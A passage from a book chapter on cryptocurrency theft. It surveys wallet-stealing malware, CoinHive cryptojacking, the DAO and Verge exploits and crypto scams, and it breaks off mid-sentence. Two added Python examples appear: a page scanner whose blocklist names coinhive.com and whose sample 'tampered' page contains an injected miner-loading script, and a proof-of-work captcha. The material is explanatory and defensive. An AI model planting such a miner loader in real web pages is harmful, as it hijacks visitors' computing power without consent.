
The first chapter of this book laid out the technical basis of cryptocurrencies, dividing them into two major types: those based on public blockchains and those based on private blockchains. Private blockchains have one or multiple authorities that act as blockchain administrators, which allows one to increase the transaction efficiency by removing the need to search for hashes, engage in monetary policy by expanding or contracting the monetary supply as necessary, revert or nullify transactions and do everything else that is done in traditional payment or monetary systems. Although the technology powering them differs slightly from distributed databases with cryptographic signatures, the functionality offered has existed since the mid-1990s and has only now garnered public prestige as Bitcoin made news. Conversely, Bitcoin itself and other public blockchains do not exhibit any of the above characteristics, or exhibit them only in a form sufficiently difficult to attain: transactions on the main chain are inefficient and require solutions that build atop it, the money supply is pre-programmed and transactions cannot be reversed under normal circumstances. These characteristics offer certain advantages and allow for the creation of marketplaces like Silk Road and ransomware, which would be more difficult to utilize over a payment system where the supervising authorities can be subpoenaed or raided.

While the ideological core demographic of cryptocurrencies very much welcomes a number of the outcomes of this irreversibility, the effects of the said activities are not experienced directly by those in support of the technology. Most people do not get their wedding photos encrypted and held hostage by Russian malware, fewer still suffer primary or secondary effects of drug addiction and, when all is said and done, the entire range of effects of monetary policy and bank bailouts is understood by such a minuscule portion of the population that one may as well have any opinion under the sun and never have it affect one’s life in a perceptible way. These effects of the operation of the Bitcoin network constitute economic externalities whose price the users of the network itself do not pay but distribute sporadically among the population as a whole. This is particularly the case with regard to the emissions generated by the mining process. Furthermore, these are either someone else’s problems or issues macroeconomic enough to be handled only at the representatives’ level, thus making the individual’s opinion largely irrelevant. What is relevant to bitcoin holders is having them stolen and there being no recourse to get them back.

There are several mechanisms through which this can occur. The first is by stealing the coins directly from the wallet of their respective owner, akin to breaking into one’s home and taking anything of value. The second group collects coins by forcing unaware computer owners, who may not even know what bitcoins are, to mine them for the criminal. There is a third, much less common group of cryptocurrency thieves that tap into the weaknesses of individual blockchains themselves and siphon the coins out of others’ wallets or mint their own coins by exploiting the very system itself. The fourth is achieved by having the individual willingly surrender their coins in expectation of greater returns, safekeeping or some other tangible benefit. A fifth group would consist of those criminals breaking into an institution keeping coins of multiple other owners and stealing them. Whilst all of the above criminals obtain cryptocurrencies from their rightful owners in different ways, the skill sets of most of the above individuals are largely identical and would fall under the umbrella of what is popularly known as hackers. In practice, this means knowledge of certain areas of programming and the ability to identify exploitable vulnerabilities in software systems. Depending on the technique, a smaller or larger degree of social engineering may be required.72

Crypto-burglars and crypto-slavers

Methods one and two in the above list typically consist of infecting the target’s computer with malware. This malware can be distributed through any of the usual means, be it through emails or websites asking the user to execute a computer program that alleges to do something that the user wants. Once the program is executed by the user it begins working for its author.

The first of these appeared already in June 2011 and targeted Windows computers.73

At this point, the selection of Bitcoin wallets was still mostly limited to the original Bitcoin Core wallet, which made it a particularly good target for attacks. Once the program was executed, all it had to do was look for the wallet file, which was always stored in the same location within the user’s personal directory. If the infected machine did not have the Bitcoin wallet installed on it, the malware would not do anything. If it did, the program attempted to email the wallet file to the attackers’ email address and pretend not to exist. Ideally, the target should remain none the wiser about what had occurred until the attacker retrieves the freshly emailed private keys for the target and transfers the entirety of the balance to their own account. The first time the target would become aware of the attack would be upon opening their wallet and seeing a transaction they did not execute. Unlike with banks and other centralized payment systems though, there would be no phone number to call for help.

72. Terms invented by the author and styled in the general spirit of cryptocurrency lingo.

73. Symantec, Infostealer.Coinbit, Web Page, 2011, accessed 15 June 2019, https://www.symantec.com/security-center/writeup/2011-061615-3651-99?tabid=2.

Several solutions to better protect one’s wallet have evolved as a result. The most basic one of these was encrypting the wallet with a password, which nonetheless could be intercepted by malware upon entry, making the system less than ideally protected. A better solution was offered by keeping the wallet application on one’s Apple iPhone, which unlike the desktop operating systems segregates the data of one application from another and thus makes it much more difficult to access the private keys. Security limitations furthermore made keyboard recording nigh impossible. The most advanced form of protection came with the so-called hardware wallets. These are specialized hardware devices that store the private keys and require the user to press physical buttons on the device to perform a transaction.

The second type of attack is more egalitarian and affects both individuals who own cryptocurrency and those who do not. The malware does not attempt to retrieve the private keys but rather turns the infected system into a cryptocurrency miner. This does not lead to a large loss of funds if detected and addressed early, but nonetheless adversely affects the computer’s performance by using up the available resources to mine cryptocurrencies. Running performance-intensive applications like video games and high definition video becomes unsustainable and even low-intensity programs such as web browsers and office suites begin to run considerably slower. The higher cycles of the central processing unit or the graphics processor also result in higher power consumption and thus electricity costs of operating the computer.

CoinHive, the most notable example of this quasi-malware, had commendable roots and followed the road laid out with good intentions. Although the service has since ceased operations, it aimed to solve a number of persistent issues faced by operators of websites: monetization and spam.74

The former is a problem that the online publications have struggled with since the popularization of the Internet. On the one hand, one needs a source of revenue for the effort put into creating the web content and to cover the costs of operating the site. On the other hand, only a handful of well-established names can effectively demand a subscription fee for their online publications. While advertising is a solution, it distracts from the contents and is not liked by the readers. Since the popularization of browser add-ons in the Firefox browser during the early 2000s, blocking advertisements has also become an option that left the hosts with no revenue to speak of. CoinHive offered a way out by forcing the browser to mine the cryptocurrency Monero while the reader had the website open.

74. CoinHive, A Crypto Miner for Your Website, Web Page, 2017, accessed 15 June 2019, https://web.archive.org/web/20190327011711/https://coinhive.com/.

At first, this may appear as a very fair way to pay for visiting the websites, as the more time the user spends on the website the more revenue they generate, providing an incentive for the content authors to create appealing pages that users would visit often. The devil in the detail was that the in-browser miner was highly inefficient and generated not only a fraction of the revenue of a non-intrusive advertisement, but also considerably less than the visitor paid in electricity costs to generate the hashes.75 The rapidly accelerating cooling fans of the reader’s computer also undoubtedly made for a less than ideal reading experience.

The issue took on new proportions once enterprising individuals understood that one does not have to follow the CoinHive authors’ advice and can embed the mining code not only without informing the user but also without informing the operator of the website. Popular web pages such as Politifact and the American television provider CBS’s Showtime were hacked and had CoinHive code inserted into them to mine Monero for the hacker.76 An even better vector of attack became apparent once the hackers figured out that CoinHive’s code can be inserted into none other than the online advertisements that CoinHive was designed to replace. Popular websites such as YouTube had now served ads that took over the CPU cycles and mined Monero while the target watched the videos.77
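A site operator can look for this kind of tampering in the HTML their own server hands out. The following is an added example, not code from the book or from any blocker project: it flags `<script>` elements that load from, or mention, a blocked domain. The domain coinhive.com is taken from the footnoted URL; the sample pages, the `/lib/miner.js` path and all function names are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Blocklist of miner-hosting domains. coinhive.com is the service named in
# the text; a real blocker's rule set would be far longer.
BLOCKED_DOMAINS = {"coinhive.com"}
# A blocked domain inside script text, not as the tail of a longer name.
MENTION_RE = re.compile(
    r"(?<![\w-])(?:" + "|".join(map(re.escape, BLOCKED_DOMAINS)) + r")\b", re.I)

def host_is_blocked(host):
    """True if host is a blocked domain or a subdomain of one."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in BLOCKED_DOMAINS)

class ScriptAuditor(HTMLParser):
    """Records <script> elements that load from, or mention, a blocked domain."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._inline = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        self._inline = src is None
        # urlparse also handles protocol-relative URLs such as //host/path.
        if src and host_is_blocked(urlparse(src).hostname):
            self.findings.append(("external", src))

    def handle_endtag(self, tag):
        if tag == "script":
            self._inline = False

    def handle_data(self, data):
        # An inline loader builds the script URL at run time, so there is no
        # src attribute to check; search the script text for the domain.
        if self._inline and MENTION_RE.search(data):
            self.findings.append(("inline", " ".join(data.split())[:50]))

def audit_page(html):
    """Return (kind, evidence) findings for one HTML document."""
    auditor = ScriptAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings

# Constructed sample pages; the /lib/miner.js path is a placeholder.
CLEAN_PAGE = """<html><head><script src="/static/app.js"></script>
<script src="https://notcoinhive.com/widget.js"></script></head></html>"""
TAMPERED_PAGE = """<html><head><script src="/static/app.js"></script>
<script src="//CoinHive.com/lib/miner.js"></script></head><body>
<script>var s = document.createElement("script");
s.src = "https://coinhive.com/lib/miner.js";
document.head.appendChild(s);</script></body></html>"""
```

A static scan like this covers the operator's own pages only; code delivered inside third-party advertisements, as in the YouTube case, never appears in the site's HTML and has to be caught in the browser by the blocker.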

Eventually, CoinHive became the target of the same parties as online advertisement. AdBlocker and antivirus providers began adding new rules to their databases to prevent any of CoinHive’s code from executing. CoinHive ceased operations in March 2019, citing that it could no longer effectively operate following a new fork of the Monero blockchain.78 Its anti-spam Captcha filter variant, which required the user to solve a number of hashes before being able to post online, died along with it as an unfortunate victim of the advertisement competitor’s success.
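The anti-spam idea behind that Captcha variant can be shown as a hashcash-style exchange: the server issues a signed challenge, the client pays for posting with hashing work, and the server checks the result with a single hash. This is an added example, not CoinHive's code; SHA-256 stands in for the Monero hashing the service used, and the function names, the 120-second lifetime and the in-memory replay set are assumptions.

```python
import hashlib
import hmac
import secrets
import time

SERVER_KEY = secrets.token_bytes(32)  # per-deployment secret (generated here)
MAX_AGE_S = 120                       # assumed challenge lifetime
_spent = set()                        # challenges already redeemed

def _tag(body):
    return hmac.new(SERVER_KEY, body.encode(), hashlib.sha256).hexdigest()

def issue_challenge(bits, now=None):
    """Server: hand out a signed, time-stamped challenge; nothing is stored."""
    ts = int(time.time() if now is None else now)
    body = f"{ts}:{bits}:{secrets.token_hex(8)}"
    return f"{body}:{_tag(body)}"

def _leading_zero_bits(digest):
    return len(digest) * 8 - int.from_bytes(digest, "big").bit_length()

def solve(challenge):
    """Client: try counters until the hash meets the difficulty."""
    bits = int(challenge.split(":")[1])
    counter = 0
    while True:
        digest = hashlib.sha256(f"{challenge}:{counter}".encode()).digest()
        if _leading_zero_bits(digest) >= bits:
            return counter
        counter += 1

def verify(challenge, counter, now=None):
    """Server: one hash checks work that cost the client about 2**bits."""
    try:
        ts, bits, nonce, tag = challenge.split(":")
        age = (time.time() if now is None else now) - int(ts)
        bits = int(bits)
    except ValueError:
        return False
    body = f"{ts}:{bits}:{nonce}"
    # Reject forged or edited challenges (for example a lowered difficulty).
    if not hmac.compare_digest(tag.encode(), _tag(body).encode()):
        return False
    if not 0 <= age <= MAX_AGE_S or challenge in _spent:
        return False
    digest = hashlib.sha256(f"{challenge}:{counter}".encode()).digest()
    if _leading_zero_bits(digest) < bits:
        return False
    _spent.add(challenge)  # each solved challenge buys exactly one post
    return True
```

The work factor doubles with every added bit of difficulty, so the cost is negligible for one human post and adds up quickly for a bulk poster.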

75. Maxence Cornet, Coinhive Review: Embeddable JavaScript Crypto Miner - 3 Days In, Web Page, 2017, accessed 15 June 2019, https://medium.com/@MaxenceCornet/coinhive-review-embeddable-javascript-crypto-miner-806f7024cde8.

76. Iain Thomson, Stealth Web Crypto-Cash Miner Coinhive Back to the Drawing Board as Blockers Move In, Web Page, 2017, accessed 15 June 2019, https://www.theregister.co.uk/2017/10/19/malwarebytes_blocking_coin_hive_browser_cryptocurrency_miner_after_user_revolt/.

77. Dan Goodin, Now Even YouTube Serves Ads With CPU-draining Cryptocurrency Miners, Web Page, 2018, accessed 15 June 2019, https://arstechnica.com/information-technology/2018/01/now-even-youtube-serves-ads-with-cpu-draining-cryptocurrency-miners/.

78. Catalin Cimpanu, Coinhive Cryptojacking Service to Shut Down in March 2019, Web Page, 2019, accessed 15 June 2019, https://www.zdnet.com/article/coinhive-cryptojacking-service-to-shut-down-in-march-2019/.

Crypto-leeches

The third type of attack is perhaps the least interesting of all, but nonetheless a fundamental element of cryptocurrencies that cannot be ignored. Many cryptocurrency enthusiasts are quick to point out that they put more trust in mathematics than they do in the fallible individuals working in the banking sector. Another popular expression used to express the same idea is the phrase “code is law” coined by the academic and activist Lawrence Lessig, albeit it appears that the nuance of Lessig’s argument has been lost in the popular understanding of the phrase.79 This naturally, as the said enthusiasts will point out equally quickly, results in subtracting the undesirable human elements from money, be it corruption, error or the agent-principal problem. A computer program does merely what it has been written to do, like a perfect servant, without questioning its authors’ commands or pursuing its own agenda.

While this has certain advantages, it also comes with a major drawback. Writing computer code that does precisely what the author intended it to do is difficult. The more complex the program becomes, the more likely it is that the human author has committed a human error and unintentionally given birth to a bug. Students of the classics will remember how the Greek king Midas asked the deity Dionysus to give him a magical touch that would turn everything to gold, only to find out that he could no longer enjoy a hearty meal or even sustain himself, as even the food and drink he touched would turn to cold, unpalatable metal. Fortunately, when it comes to software development one can usually wish for more wishes and rectify the problem so that it no longer produces the unintended effects.

Bitcoin prides itself on the fact that the blockchain itself has never been hacked. Nobody has yet found a way to simply add more bitcoins to their wallet out of thin air or delete others’ bitcoins through some unforeseen error in the system’s code. The same cannot be said about certain other projects.

One of the most famous examples of this, largely by virtue of occurring early, occurred in the previously mentioned Ethereum. The blockchain differentiated itself from Bitcoin and other cryptocurrency projects of the time by not being merely a distributed ledger for moving coins between wallets, but by offering additional distributed computing functionality on top of the blockchain. The participants cannot use the computers of other participants for computationally intensive tasks and reward them with cryptocurrencies, which has been proposed by some other projects, but rather the mining process itself can include very inefficient computing performed across the entire network. While this may at first appear of questionable benefit, this sort of process can be used for executing what Ethereum calls “smart contracts”. These are in practice just computer programs that do something when specific conditions are met and cannot be interfered with.

79. Lawrence Lessig, Code Is Law: On Liberty in Cyberspace, Web Page, 2000, https://harvardmagazine.com/2000/01/code-is-law-html.

Early in Ethereum’s life, one such contract known as the Decentralized Autonomous Organization (DAO) had been launched to create a kind of Ethereum fund. Assets would be added to it and the shareholders of the fund could decide what the fund would invest in by voting through its smart contract. As very quickly became apparent, the DAO had a bug in it which allowed the attackers to siphon the currency “ether” out of the fund over and over again. The attacker who exploited it managed to withdraw $60 million from the investors. The transactions could not be reverted and there was no routine way to return the funds to their proprietors. What happened is that the magnitude of the theft and its potential to drag the entire project down with it led a sufficient number of ether miners to decide to revert the blockchain to the state prior to the exploit. This effectively nullified all the transactions taking place following the hack, including not only the apparently illicit withdrawal itself but also everything else. If one had used Ethereum to buy stolen credit card numbers on some successor to Silk Road, those purchases had suddenly become gratis. Any ether bought following the hack on an exchange against payment in bitcoin or another unaffected cryptocurrency was also no longer part of the Ethereum blockchain. This defiance of the “code is law” mantra had nonetheless irked a number of more devout Ethereum miners, who concluded that they would continue to operate on the blockchain where the hack had occurred. It became a second Ethereum blockchain known as Ethereum Classic. The two blockchains are identical until the point of reversal and diverge shortly before the hack. The previous holders of ether now owned the same quantity of two coins, ether (ETH) and ethereum classic (ETC).80

Although this is probably the most notable example of the code itself being hacked, the subject of the hack was a smart contract rather than the Ethereum blockchain itself. This is not to say that there had not been some attacks on the underlying blockchains themselves. In 2018, one such blockchain was Verge, wherein the hacker succeeded in decreasing the difficulty of mining the cryptocurrency by approximately 6 billion times for some miners, but not for others, thus generating approximately $80 per second worth of coins for their own wallet.81 Some other blockchains had been exploited in similar ways.82 Even the thus far flawless Bitcoin blockchain was in danger of creating additional bitcoins when a bug in its reference implementation had been discovered. In this case, the bug was found by the developers themselves and patched before it could be exploited.83

80. David Siegel, Understanding the DAO Attack, Web Page, 2016, accessed 25 June 2019, https://www.coindesk.com/understanding-dao-hack-journalists.

81. Daniel Goldman, The Verge Hack, Explained: Time Warps, Mining Exploits, Denial of Service, and More!, Web Page, 2018, accessed 25 June 2019, https://blog.theabacus.io/the-verge-hack-explained-7942f63a3017.

82. Mike Orcutt, Once Hailed as Unhackable, Blockchains Are Now Getting Hacked, Web Page, 2019, accessed 25 June 2019, https://www.technologyreview.com/s/612974/once-hailed-as-unhackable-blockchains-are-now-getting-hacked/.

To summarize, in the case of cryptocurrencies code does indeed appear to be law, and human error within the fabric of the blockchain itself can lead to exploits by a third party. When push comes to shove and a sufficient number of otherwise ardent “code is law” proponents have their investments expropriated from them through the said law, the attitudes appear to change rather rapidly. In most cases, the system’s greatest strength also appears to be its major weakness. The vast sums locked in the cryptocurrencies also make them perfect targets for such hacking attempts. Whereas compromising a corporate web server merely may be profitable, exploiting a blockchain is almost certainly guaranteed to be so. Even in the case of Ethereum, where transactions have been reverted, the continued existence of Ethereum Classic had more than compensated the exploiter.

Crypto-scammers

Method four is in principle not unique to cryptocurrencies and falls into the general category of Internet scams, phishing (an attempt to present the fraudsters’ page as that of a legitimate organization) or Ponzi schemes. As with ransomware and narcotics, all of these activities were possible and prevalent before and were merely accelerated to a new level with the addition of Bitcoin and its younger siblings, which allowed comparably quick and irreversible transactions.

While crypto-burglars wrote software that would steal the private keys, a group of